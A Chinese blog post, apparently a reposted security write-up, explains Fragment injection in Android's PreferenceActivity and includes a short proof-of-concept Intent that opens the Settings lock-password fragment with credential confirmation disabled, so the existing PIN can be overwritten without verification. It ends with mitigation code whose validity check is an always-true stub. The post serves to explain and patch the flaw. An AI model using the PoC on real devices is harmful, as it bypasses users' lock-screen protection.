• [置顶] Android框架攻击之Fragment注入


    为了适应越来越大的设备屏幕,Android在3.X后引入了Fragment概念,作用是可以在一个屏幕上同时显示多个Activity,以达到充分利用屏幕的目的。关于Fragment的使用说明,可以阅读Android Fragment完全解析,关于碎片你所需知道的一切。其中,Fragment有一个很强大的功能,就是可以动态加载。这样可以让整个界面的开发更加灵活,可以根据不同的场景动态加加载不同的Activity。

    回到今天的主题——利用Fragment实现注入攻击。从3.X后,android工程师重构PreferenceActivity的实现,采用Fragment实现界面的加载。通过阅读源码可以发现,PreferenceActivity的onCreate里,需要读取Intent的多个extra内容,常量都定义在PreferenceActivity里(那堆EXTRA_XXXX就是了),其中有两个常量分别是EXTRA_SHOW_FRAGMENT=":android:show_fragment"EXTRA_SHOW_FRAGMENT_ARGUMENTS=":android:show_fragment_args",这两个参数可以决定当前的PreferenceActivity首次显示的Fragment。过程比较简单,就是先拿到fragment_class和fragment_args,然后通过反射生成一个Fragment实例,并动态加载。关键源码如下所示:


    mSinglePane = hidingHeaders || !onIsMultiPane();
            String initialFragment = getIntent().getStringExtra(EXTRA_SHOW_FRAGMENT);
           Bundle initialArguments = getIntent().getBundleExtra(EXTRA_SHOW_FRAGMENT_ARGUMENTS);
            int initialTitle = getIntent().getIntExtra(EXTRA_SHOW_FRAGMENT_TITLE, 0);
            int initialShortTitle = getIntent().getIntExtra(EXTRA_SHOW_FRAGMENT_SHORT_TITLE, 0);


    先获取initalFragment和initialArguments两个参数,之后在switchToHeaderInner里完成实例化:

    private void switchToHeaderInner(String fragmentName, Bundle args, int direction) {
            getFragmentManager().popBackStack(BACK_STACK_PREFS,
                    FragmentManager.POP_BACK_STACK_INCLUSIVE);
            Fragment f = Fragment.instantiate(this, fragmentName, args);
            FragmentTransaction transaction = getFragmentManager().beginTransaction();
            transaction.setTransition(FragmentTransaction.TRANSIT_FRAGMENT_FADE);
            transaction.replace(com.android.internal.R.id.prefs, f);
            transaction.commitAllowingStateLoss();
        }


    到此为止,我们可以通过设置Intent的extral,实现动态修改PreferenceActivity的初次显示的Fragment。

    我们知道,在Android系统里,App与App是互相隔离的,互相之间不能访问对方的私有数据。App与App之间(更准确地说应该是组件与组件之间)的通讯,统一使用Intent。通过Intent可以很方便的唤起其他App的Activity,达到功能重用的目的。比如平时使用ZAKER,你需要在微信圈里分享,通过这种方式就可以直接跳到微信的分享界面了。但使用这种方式的前提是目标Activity是exported的。

    结合上面的两个关键点,我们是否可以寻找一个exported的PreferenceActivity的子类,并通过精心设置Intent的extral的值,以实现打开那些没有exported的界面呢?如果这些界面涉及安全方面信息的话,又会怎样呢?

    Setting几乎每个Android设备都有的。Setting是以system_uid方式签名,所以具备行使system的权力。它的主界面com.android.settings.Settings就是继承自PreferenceActivity,而且肯定是exported。我们以此作为入口,尝试寻找Setting里有哪些重要的Fragment,并尝试把它加载进来,主要目的是希望可以跳过某些需要用户交互的限制。比如说ChooseLockPassword$ChooseLockPasswordFragment这个Fragment,这个类主要是负责锁屏界面的密码设定和修改。同时,这个类会根据之前传入的initialArguments做不同的逻辑,关键代码如下所示:

     Intent intent = getActivity().getIntent();
                final boolean confirmCredentials = intent.getBooleanExtra("confirm_credentials", true);
                if (savedInstanceState == null) {
                    updateStage(Stage.Introduction);
                    if (confirmCredentials) {
                        mChooseLockSettingsHelper.launchConfirmationActivity(CONFIRM_EXISTING_REQUEST,
                                null, null);
                    }
                } else {
                    mFirstPin = savedInstanceState.getString(KEY_FIRST_PIN);
                    final String state = savedInstanceState.getString(KEY_UI_STAGE);
                    if (state != null) {
                        mUiStage = Stage.valueOf(state);
                        updateStage(mUiStage);
                    }
                }

    如果传入的参数当中,key为"confirm_credentials"为true,就会调起旧密码验证的流程。如果为false,就可以跳过旧密码验证而直接进入密码修改的流程。测试代码如下所示:

    Intent intent = new Intent();
    		intent.setFlags(Intent.FLAG_ACTIVITY_CLEAR_TASK);
    		intent.setClassName("com.android.settings", "com.android.settings.Settings");
    		intent.putExtra(":android:show_fragment", "com.android.settings.ChooseLockPassword$ChooseLockPasswordFragment");
    		intent.putExtra("confirm_credentials", false);
    
    		startActivity(intent);


    正常的密码修改流程是"设置"->"安全"->"屏幕锁定"->"确认你的PIN",如所下图所示:



    如果运行DEMO,则直接进入如下界面:




    这样你直接输入密码,就可以把原来的密码覆盖掉了。

    这个BUG存在于3.X到4.3中的所有版本,4.4已经fix了。4.4强制所有PreferenceActivity必须要实现isValidFragment方法,详细见这里

     

     

    个人总结:

    应该说,这种修复方式,只是起到一个提醒的作用,最终的安全还是交由开发者承担。另外,目前很多应用都是基于2.X的,所以要兼容在4.4上跑而不crash,只要在PreferenceActivity的子类都补充加上isValidFragment方法就可以了。但对于4.4之前的版,如果存在这种权限泄露的问题,还是需要单独处理的。下面给出兼容2.X~4.4修复的代码示例:

     

    public final class MyPreferenceActivity extends PreferenceActivity {
    	
    	private boolean doValidcheck(String fragmentName) throws IllegalArgumentException{
    		//TODO 做合法性检查
    		
    		return true;
    	}
    	
    	//添加上这个方法,以使2.x~4.3的代码在4.4上可以正常运行
    	protected boolean isValidFragment(String fragmentName) {
    		return doValidcheck(fragmentName);
    	}
    	
    	@Override
    	protected void onCreate(Bundle savedInstanceState) {
    		//在onCreate前就做合法性判断
    		String fragmentname = getIntent().getStringExtra(":android:show_fragment");
    		doValidcheck(fragmentname);
    
    		super.onCreate(savedInstanceState);
    	}
    }


  • 相关阅读:
    Spring MVC的路径匹配规则 Ant-style
    mybatis的mapper参数传递
    mybatis映射文件的使用(一),工程目录结构、源代码和数据库
    mappers标签引入映射器的四种方式
    Java语言定义的线程状态分析
    MySQL中varchar最大长度是多少
    mysql中字符串类型char(n)和varchar(n)的区别
    CORS解决跨域问题的几种方法
    使用自定义注解和springAOP捕获Service层异常,并处理自定义异常
    自定义HttpMessageConverter实现RestTemplate的exchange方法返回自定义格式数据
  • 原文地址:https://www.cnblogs.com/riasky/p/3471323.html
Copyright © 2020-2023  润新知